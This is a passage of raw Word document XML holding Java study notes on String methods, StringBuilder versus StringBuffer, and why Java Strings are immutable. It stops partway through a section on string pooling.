          <w:p w14:paraId="4D9F5BB2"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toLowerCase()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758DA0BD"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Converts to lowercase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="7AF0755C" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56E037C2"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toUpperCase()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72C7ED88"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Converts to uppercase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="02A8DC4B" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75D34D78"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substring(start)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="464FE8F5"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Extracts a part of the string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="3EA0B826" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2317E232"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contains(str)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="664D4D70"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Checks if substring is present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="78F66AB1" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36C56A50"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split(regex)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E8C571A"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Splits string into array</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="51FC834D" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2067F7DF"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replace(a, b)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F9CEB52"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Replaces characters or substrings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="0A8B6293" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F460AFF"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trim()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D20B34D"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Removes leading/trailing spaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="610E67BC" w14:textId="77777777" w:rsidR="00B43C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43C62" w:rsidP="00A4286A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A157A36" w14:textId="48E70096" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">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Mutable Alternatives</w:t>
      </w:r>
      <w:r w:rsidR="00AA35CC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>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35"/>
        <w:gridCol w:w="1146"/>
        <w:gridCol w:w="3067"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="555EE591" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54FE5B5B" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="0076381B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D03A7EC" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="0076381B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thread Safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="504DD7DC" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="0076381B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="49A54B79" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3499D2EE"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StringBuilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C3DB37B" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="361B1FF2"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Faster in single-threaded apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="00770679" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="654D4283"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StringBuffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FFD8876" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C68EDC9" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>For multi-threaded environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71400A40" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A4286A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="375CA6BB">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D61F3B" w14:textId="7586955D" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">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Example</w:t>
      </w:r>
      <w:r w:rsidR="0038254F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD98D5" w14:textId="77777777" w:rsidR="001D64E8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D64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005982"/>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xamp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C3D2707" w14:textId="77777777" w:rsidR="001D64E8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D64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00598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10F16EE" w14:textId="77777777" w:rsidR="001D64E8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D64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00598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gree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Hello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF64B4" w14:textId="77777777" w:rsidR="001D64E8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D64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005982"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        gree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World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF728BB" w14:textId="77777777" w:rsidR="001D64E8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D64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00598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re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Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E25184" w14:textId="77777777" w:rsidR="001D64E8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D64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00598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93E5BE1" w14:textId="763F79CB" w:rsidR="001D64E8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D64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005982"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B462C" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000A485D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="78753809">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E2906" w14:textId="3D37D7B9" w:rsidR="00A8268C" w:rsidRPr="00CE4B95" w:rsidRDefault="00571725">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc196307498"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why </w:t>
      </w:r>
      <w:r w:rsidR="00570340" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">tring </w:t>
      </w:r>
      <w:r w:rsidR="008115F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>immutable in java</w:t>
      </w:r>
      <w:r w:rsidR="00A8268C" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="2C5A3CDD" w14:textId="150B21F0" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00AA4E40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Why is String immutable in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDDA362" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Because once a String object is created, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>its value cannot be changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Any operation that seems to "modify" a string actually creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1A9CF" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95"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343EB409">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6C67C7" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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But WHY did Java make Strings immutable?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6279E" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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1. Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBAA8A6" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Strings are widely used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>file paths, network connections, class loading, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E4B063" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If a String were mutable, someone could change:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBF604" w14:textId="77777777" w:rsidR="00913A80" w:rsidRPr="00CE4B95" w:rsidRDefault="00913A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794998"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Original path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B79C036" w14:textId="77777777" w:rsidR="00913A80" w:rsidRPr="00CE4B95" w:rsidRDefault="00913A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794998"/>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path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home/user/app"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3CF0B1" w14:textId="70F5BFF6" w:rsidR="00913A80" w:rsidRPr="00CE4B95" w:rsidRDefault="00913A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794998"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Imagine someone changes it to a malicious path!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EB2941" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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Immutability prevents tampering with sensitive data like usernames, passwords, and URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039A6EAB" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95"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648D9D1A">
          <v:rect id="_x0000_i1089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694579B" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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2. String Pooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F1CC13" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
